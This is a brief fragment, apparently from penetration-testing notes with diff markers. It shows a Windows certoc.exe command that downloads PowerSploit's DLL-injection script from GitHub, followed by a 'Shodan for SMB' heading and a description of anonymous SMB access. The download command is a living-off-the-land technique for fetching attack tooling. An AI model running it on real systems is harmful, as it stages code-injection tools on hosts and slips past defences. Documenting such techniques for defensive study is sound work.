Windows

 certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1

-Shodan for SMB:
+Shodan for SMB

 SMB ( Server Message Block ) authentication without credentials, also known as anonymous SMB access, allows users to access shared resources on a network without providing username or passwords.
 This can be useful for accessing shared folders that have been configured to allow anonymous access.